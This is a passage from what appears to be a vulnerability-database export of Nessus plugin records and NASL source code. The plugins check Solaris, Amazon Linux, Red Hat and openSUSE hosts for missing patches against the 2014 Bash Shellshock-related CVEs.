10\\.9($|\\.[0-5]([^0-9]|$))\", string:os)) exit(0, \"The remote host uses a version of Mac OS X Mavericks later than 10.9.5.\");\n\npackages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = egrep(pattern:\"^com\\.apple\\.pkg\\.update\\.security\\..*bom$\", string:packages);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n match = eregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(match[1]) || empty_or_null(match[2]))\n continue;\n\n patch_found = check_patch(year:int(match[1]), number:int(match[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:19:57", "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Bash). The supported version that is affected is 10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Solaris executes to compromise Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Solaris accessible data.\n\nThis plugin has been deprecated and either replaced with individual 126546 patch-revision plugins, or deemed non-security related.", "cvss3": {}, "published": "2012-09-26T00:00:00", "type": "nessus", "title": "Solaris 10 (sparc) : 126546-10 (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2016-5480"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_126546.NASL", "href": "https://www.tenable.com/plugins/nessus/62305", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2018/03/12. Deprecated and either replaced by\n# individual patch-revision plugins, or has been deemed a\n# non-security advisory.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(62305);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\", \"CVE-2016-5480\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n\n script_name(english:\"Solaris 10 (sparc) : 126546-10 (deprecated)\");\n script_summary(english:\"Check for patch 126546-10\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Bash). The supported version that is affected is\n10. Easily exploitable vulnerability allows low privileged attacker\nwith logon to the infrastructure where Solaris executes to compromise\nSolaris. Successful attacks require human interaction from a person\nother than the attacker. Successful attacks of this vulnerability can\nresult in unauthorized update, insert or delete access to some of\nSolaris accessible data.\n\nThis plugin has been deprecated and either replaced with individual\n126546 patch-revision plugins, or deemed non-security related.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/126546-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"n/a\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/26\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Consult specific patch-revision plugins for patch 126546 instead.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:18", "description": "GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.\n\nNOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and this bulletin is a follow-up to ALAS-2014-418.\n\nIt was discovered that the fixed-sized redir_stack could be forced to overflow in the Bash parser, resulting in memory corruption, and possibly leading to arbitrary code execution when evaluating untrusted input that would not otherwise be run as code.\n\nAn off-by-one error was discovered in the way Bash was handling deeply nested flow control constructs. Depending on the layout of the .bss segment, this could allow arbitrary execution of code that would not otherwise be executed by Bash.\n\nSpecial notes :\n\nBecause of the exceptional nature of this security event, we have backfilled our 2014.03, 2013.09, and 2013.03 Amazon Linux AMI repositories with new bash packages that also fix both CVE-2014-7169 and CVE-2014-6271 .\n\nFor 2014.09 Amazon Linux AMIs, 'bash-4.1.2-15.21.amzn1' addresses both CVEs. Running 'yum clean all' followed by 'yum update bash' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2014.03 repositories, 'bash-4.1.2-15.21.amzn1' also addresses both CVEs. Running 'yum clean all' followed by 'yum update bash' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2013.09 or 2013.03 repositories, 'bash-4.1.2-15.18.22.amzn1' addresses both CVEs. Running 'yum clean all' followed by 'yum update bash' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2012.09, 2012.03, or 2011.09 repositories, run 'yum clean all' followed by 'yum\n--releasever=2013.03 update bash' to install only the updated bash package.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a version of the Amazon Linux AMI that was part of our public beta, and we encourage you to move to a newer version of the Amazon Linux AMI as soon as possible.", "cvss3": {}, "published": "2014-10-12T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : bash (ALAS-2014-419)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:bash", "p-cpe:/a:amazon:linux:bash-debuginfo", "p-cpe:/a:amazon:linux:bash-doc", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-419.NASL", "href": "https://www.tenable.com/plugins/nessus/78362", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-419.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78362);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_xref(name:\"ALAS\", value:\"2014-419\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Amazon Linux AMI : bash (ALAS-2014-419)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"GNU Bash through 4.3 bash43-025 processes trailing strings after\ncertain malformed function definitions in the values of environment\nvariables, which allows remote attackers to write to files or possibly\nhave unknown other impact via a crafted environment, as demonstrated\nby vectors involving the ForceCommand feature in OpenSSH sshd, the\nmod_cgi and mod_cgid modules in the Apache HTTP Server, scripts\nexecuted by unspecified DHCP clients, and other situations in which\nsetting the environment occurs across a privilege boundary from Bash\nexecution.\n\nNOTE: this vulnerability exists because of an incomplete fix for\nCVE-2014-6271 and this bulletin is a follow-up to ALAS-2014-418.\n\nIt was discovered that the fixed-sized redir_stack could be forced to\noverflow in the Bash parser, resulting in memory corruption, and\npossibly leading to arbitrary code execution when evaluating untrusted\ninput that would not otherwise be run as code.\n\nAn off-by-one error was discovered in the way Bash was handling deeply\nnested flow control constructs. Depending on the layout of the .bss\nsegment, this could allow arbitrary execution of code that would not\notherwise be executed by Bash.\n\nSpecial notes :\n\nBecause of the exceptional nature of this security event, we have\nbackfilled our 2014.03, 2013.09, and 2013.03 Amazon Linux AMI\nrepositories with new bash packages that also fix both CVE-2014-7169\nand CVE-2014-6271 .\n\nFor 2014.09 Amazon Linux AMIs, 'bash-4.1.2-15.21.amzn1' addresses both\nCVEs. Running 'yum clean all' followed by 'yum update bash' will\ninstall the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2014.03 repositories,\n'bash-4.1.2-15.21.amzn1' also addresses both CVEs. Running 'yum clean\nall' followed by 'yum update bash' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2013.09 or 2013.03 repositories,\n'bash-4.1.2-15.18.22.amzn1' addresses both CVEs. Running 'yum clean\nall' followed by 'yum update bash' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2012.09, 2012.03, or 2011.09\nrepositories, run 'yum clean all' followed by 'yum\n--releasever=2013.03 update bash' to install only the updated bash\npackage.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a\nversion of the Amazon Linux AMI that was part of our public beta, and\nwe encourage you to move to a newer version of the Amazon Linux AMI as\nsoon as possible.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://aws.amazon.com/amazon-linux-ami/faqs/#lock\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2014-418.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2014-419.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update bash' to update your system. Note that you may need to\nrun 'yum clean all' first.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"bash-4.1.2-15.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"bash-debuginfo-4.1.2-15.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"bash-doc-4.1.2-15.21.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:43", "description": "[Updated September 30, 2014] This advisory has been updated with information on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables need to be made aware of changes to the way names are handled by this update. Note that certain services, screen sessions, and tmux sessions may need to be restarted, and affected interactive users may need to re-login. Installing these updated packages without restarting services will address the vulnerability, but functionality may be impacted until affected services are restarted. For more information see the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their containers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 / 7 : bash (RHSA-2014:1306)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bash", "p-cpe:/a:redhat:enterprise_linux:bash-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bash-doc", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.5", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2014-1306.NASL", "href": "https://www.tenable.com/plugins/nessus/77895", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1306. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77895);\n script_version(\"1.39\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_bugtraq_id(70137, 70152, 70154);\n script_xref(name:\"RHSA\", value:\"2014:1306\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"RHEL 5 / 6 / 7 : bash (RHSA-2014:1306)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"[Updated September 30, 2014] This advisory has been updated with\ninformation on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment\nvariables need to be made aware of changes to the way names are\nhandled by this update. Note that certain services, screen sessions,\nand tmux sessions may need to be restarted, and affected interactive\nusers may need to re-login. Installing these updated packages without\nrestarting services will address the vulnerability, but functionality\nmay be impacted until affected services are restarted. For more\ninformation see the Knowledgebase article at\nhttps://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their\ncontainers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer\nto the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/articles/1200223\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1306\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7187\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash, bash-debuginfo and / or bash-doc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1306\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bash-debuginfo-3.2-33.el5_11.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bash-debuginfo-3.2-33.el5_11.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bash-debuginfo-3.2-33.el5_11.4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bash-debuginfo-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bash-debuginfo-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bash-4.2.45-5.el7_0.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bash-debuginfo-4.2.45-5.el7_0.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.2.45-5.el7_0.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bash-doc-4.2.45-5.el7_0.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:22:37", "description": "The command-line shell 'bash' evaluates environment variables, which allows the injection of characters and might be used to access files on the system in some circumstances (CVE-2014-7169).\n\nPlease note that this issue is different from a previously fixed vulnerability tracked under CVE-2014-6271 and it is less serious due to the special, non-default system configuration that is needed to create an exploitable situation.\n\nTo remove further exploitation potential we now limit the function-in-environment variable to variables prefixed with BASH_FUNC_ . This hardening feature is work in progress and might be improved in later updates.\n\nAdditionaly two more security issues were fixed in bash:\nCVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n\nCVE-2014-7187: Nesting of for loops could lead to a crash of bash.", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-SU-2014:1229-1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:12.3"], "id": "OPENSUSE-2014-563.NASL", "href": "https://www.tenable.com/plugins/nessus/77966", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-563.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77966);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-SU-2014:1229-1) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The command-line shell 